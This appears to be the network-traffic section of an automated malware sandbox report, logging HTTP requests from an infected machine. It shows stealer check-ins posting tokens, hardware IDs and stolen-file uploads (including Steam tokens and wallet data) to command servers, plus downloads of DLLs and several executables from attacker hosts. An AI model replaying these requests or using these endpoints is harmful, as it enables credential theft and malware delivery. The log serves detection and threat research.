Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 2d 2d 0d 0a Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="file"------BFBAAFHDHCBGCAKFHDAK--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017482001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017483001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="message"wallets------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d 0a Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="message"files------CBFCBKKFBAEHJKEBKFCB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 2d 2d 0d 0a Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="file"------JJKEBGHJKFIDGCAAFCAF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"ybncbhylepme------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017484001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic	HTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: /Content-Type: application/jsonContent-Length: 517712Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 39 34 38 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global traffic	HTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745?argument=cp4z9SBCom0mjbAy1734599493 HTTP/1.1Host: home.fivetk5vt.topAccept: /
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017485001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"stok------EBAAAFBGDBKKEBGCFCBF--
Source: global traffic	HTTP traffic detected: GET /files/lolz/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017486001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFIEBFCBKFHIDHIJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="build"stok------FIDAFIEBFCBKFHIDHIJE--
Source: global traffic	HTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017487001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017488001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5vt.topAccept: /Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------8ORzNntBtFTcs2Ev6GtoTyData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 4f 52 7a 4e 6e 74 42 74 46 54 63 73 32 45 76 36 47 74 6f 54 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 75 77 65 6d 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff ff 89 8d f8 02 12 1f 07 67 ef 8b fc 8f 4e f9 b5 23 6a fe b4 47 c3 b1 eb f2 06 ce 32 d2 c5 53 d9 5b 5d a5 24 a0 f3 e1 20 ce 1f 11 3b 02 72 d9 10 3d eb 0a b6 79 19 e7 7e 8e 39 b6 22 3f 6b 3a 37 12 ef 60 55 f4 1a cc 38 fb dd 80 38 fa a3 68 06 af 90 e0 97 67 db 4b a4 b0 68 0f a7 98 44 08 24 b3 0a f4 80 b7 27 ce 81 47 a7 77 83 2d 9a b1 1d 27 dc b0 3a ef ac 81 03 cd 66 9e b1 68 37 65 64 bf fb e3 0c e2 40 31 29 4b 5f 3c 6f d7 6c 78 d0 7b 80 e6 f4 56 02 6e 86 c2 e7 63 60 62 28 03 30 28 9c 01 1e f7 e1 c7 c8 36 f4 85 d8 e1 c7 34 cc d2 48 61 c6 4f 73 70 43 f3 8e 80 6d fb 7e e2 a9 51 b5 ff 9f 42 c2 f0 2d 5e 8f 81 7e 63 fe 91 e8 fa b9 0e 4e 59 51 81 9b 8c a2 3a c5 4b 78 a1 f8 bf 95 5c 64 f8 7d 86 c3 4b 5b 01 77 6f cc 38 84 b2 c5 9e 2f 61 34 e6 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 4f 52 7a 4e 6e 74 42 74 46 54 63 73 32 45 76 36 47 74 6f 54 79 2d 2d 0d 0a Data Ascii: --------------------------8ORzNntBtFTcs2Ev6GtoTyContent-Disposition: form-data; name="file"; filename="Huwema.bin"Content-Type: application/octet-streamgN#jG2S[]$ ;r=y~9"?k:7`U88hgKhD$'Gw-':fh7ed@1)K_<olx{Vnc`b(0(64HaOspCm~QB-^~cNYQ:Kx\d}K[wo8/a4--------------------------8ORzNntBtFTcs2Ev6GtoTy--
Source: global traffic	HTTP traffic detected: GET /files/london/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5vt.topAccept: /Content-Length: 58860Content-Type: multipart/form-data; boundary=------------------------D9pB4dIt8GxtVDtc4I4jGLData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 44 39 70 42 34 64 49 74 38 47 78 74 56 44 74 63 34 49 34 6a 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 75 66 65 6a 65 6a 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a dd a2 06 9e 58 b3 38 9c ea bc db 2a 1c 48 6b a5 1a 1c f0 99 61 8a 9d 0d 58 96 1f 36 03 5c 54 da 3b 14 0d 7a ac c7 5c ef ba 84 c3 46 e2 92 01 71 22 e6 aa 73 8b b2 13 d5 23 68 58 26 a5 22 82 45 77 47 8b 32 f2 f2 88 1c 7e ee ac 4f 84 e2 2b 08 17 a6 b8 c2 a4 05 c6 73 55 58 47 02 86 a5 ab d3 51 08 2c 1f 36 cd 9f 70 3d ca 53 2f 66 b7 56 09 3a cf cf 67 5a 6d 8d 29 43 e0 08 9a ff 03 f6 65 c4 9e 32 c7 0b e5 00 65 62 6a fc d7 06 3f 79 7d 85 dd 1e 32 ae a5 ba 6f 6b ad 54 73 5c 6f ad 22 79 99 c7 84 7a 6f 34 f5 07 4b 35 32 a3 2f 1c 04 5d 85 74 28 3f 6c e2 36 be f6 c9 45 d8 56 d3 a6 e8 a3 7b b1 84 56 dd 05 cc 61 a2 05 10 ae 8a 92 7f 73 83 0f f4 61 0e 79 41 3c 27 46 58 21 8b c2 0a aa fb 7a 39 fd 8a 1c 65 4e 91 e3 e3 2a 4f 90 f7 60 66 c8 87 67 a7 4f 01 82 c8 7e 38 d3 56 5e 9a e7 7d 29 29 cd b7 01 2b 49 a9 67 6b 40 35 3d 0c c6 35 81 e3 93 19 b0 11 9f 65 44 bd 8d b9 f0 18 1f d6 54 65 c6 19 bc 2d a4 b6 90 ae 4f a5 43 ef be 60 45 78 b8 6f 3b 38 78 